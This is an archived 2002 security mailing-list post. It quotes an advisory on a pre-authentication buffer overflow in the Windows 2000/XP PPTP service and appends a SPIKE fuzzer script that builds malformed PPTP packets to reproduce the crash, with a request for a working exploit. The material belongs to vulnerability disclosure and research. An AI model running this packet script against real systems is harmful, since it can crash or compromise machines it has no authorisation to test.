OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Dave Aitel (dave_at_immunitysec.com)
Date: Thu Sep 26 2002 - 15:13:21 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    SPIKE 2.6.2 or above should be able to handle this .spk file which will
    replicate the vulnerability. Someone send me a working sploit in
    exchange, please. I'm too lazy to muck with it. (Or I have other
    exploits to muck with, one or the other :>)

    -dave
    P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
    at http://www.immunitysec.com/spike.html, if you haven't already.
    P.P.S. This script is released under the terms of the GNU GPL v 2.0.

    On Thu, 2002-09-26 at 05:43, shphion.com wrote:
    > phion Security Advisory 26/09/2002
    >
    > Microsoft PPTP Server and Client remote vulnerability
    >
    >
    > Summary
    > -----------------------------
    >
    > The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
    > remotely exploitable pre-authentication bufferoverflow.
    >
    >
    > Affected Systems
    > -----------------------------
    >
    > Microsoft Windows 2000 and XP running either a PPTP Server or Client.
    >
    >
    > Impact
    > -----------------------------
    >
    > With a specially crafted PPTP packet it is possible to overwrite kernel
    > memory.
    >
    > A DoS resulting in a lockup of the machine has been verified on
    > Windows 2000 SP3 and Windows XP.
    >
    > A remote compromise should be possible deploying proper shellcode,
    > as we were able to fill EDI and EDX with our data.
    >
    > Clients are vulnerable too, because the Service always listens on port
    > 1723 on any interface of the machine, this might be of special concern
    > to DSL users which use PPTP to connect to their modem.
    >
    >
    > Solution
    > -----------------------------
    >
    > As a temporary solution for the Client issue, one might firewall the PPTP
    > port in the Internet Connection Firewall for Windows XP.
    >
    > We dont know of any solution for Windows 2000 and Windows XP PPTP servers.
    >
    > The vendor has been informed.
    >
    >
    > Acknowledgements
    > -----------------------------
    >
    > The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
    > on behalf of phion Information Technologies.
    >
    >
    > Contact Information
    > -----------------------------
    >
    > phion Information Technologies can be reached via:
    > officephion.com / http://www.phion.com
    >
    > Stephan Hoffmann can be reached via:
    > shphion.com
    >
    > Thomas Unterleitner can be reached via:
    > t.unterleitnerphion.com
    >
    > References
    > -----------------------------
    >
    > [1] phion Information Technologies
    > http://www.phion.com/
    >
    > Exploit
    > -----------------------------
    >
    > phion Information Technologies will not provide an exploit for this issue.
    >
    >
    > Disclaimer
    > -----------------------------
    >
    > This advisory does not claim to be complete or to be usable for any
    > purpose.
    >
    > This advisory is free for open distribution in unmodified form.
    >
    > Articles or Publications that are based on information from this advisory
    > have to include link [1].
    >
    >

    //start control request
    s_block_start("PPTP");
    s_binary_block_size_halfword_bigendian("PPTP");
    //message type 1 - control request
    s_int_variable(0x0001,5);
    //cookie
    s_binary("1a 2b 3c 4d");
    //type 1 - start control request
    //5 is big endian halfword
    s_int_variable(0x0001,5);
    //reserved
    s_binary("0000");
    //version 1.0
    s_int_variable(0x0100,5);
    //reserved
    s_binary("0000");
    //Framing: Ethernet
    s_binary("00000003");
    //Bearer: Digital
    s_binary("00000002");
    //maximum channels
    s_binary("ffff");
    //firmware revision
    s_int_variable(0x0001,5);

    //hostname
    s_string_variable("A");
    s_binary_repeat("00",63);

    //vendor
    s_string_variable("A");
    s_binary_repeat("00",63);

    s_block_end("PPTP");

    ///
    /// NEXT PACKET
    ///
    ///

    //start outgoing call request
    s_block_start("PPTP2");
    s_binary_block_size_halfword_bigendian("PPTP2");
    //message type 1 - control request
    s_int_variable(0x0001,5);

    //cookie
    s_binary("1a 2b 3c 4d");
    //type 1 - outgoing call request
    //5 is big endian halfword
    s_int_variable(0x0007,5);
    //reserved
    s_binary("0000");

    //call id
    s_binary("0000");

    //serial number
    s_binary("0000");

    //min bps
    s_binary("00000960");
    //max bps
    s_binary("00989680");
    //bearer capabilities
    s_binary("00000002");
    //framing
    s_binary("00000003");
    //recieve window size
    s_binary("0003");
    //processing delay
    s_binary("0000");

    s_binary_block_size_halfword_bigendian("PHONENUMBER");
    //reserved
    s_binary("0000");
    s_block_start("PHONENUMBER");
    s_string_variable("");
    s_block_end("PHONENUMBER");
    //subaddress
    s_string_variable("");
    s_block_end("PPTP2");

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQA9k2phB8JNm+PA+iURAqm7AJsE25Xs+qBtfAmxnXsdtIGt1oxm6gCg04iX
    alcRcjRAYoVrPGnYrPxPDxk=
    =3TKd
    -----END PGP SIGNATURE-----

    _______________________________________________
    Spike mailing list
    Spikeimmunitysec.com
    http://www.immunitysec.com/mailman/listinfo/spike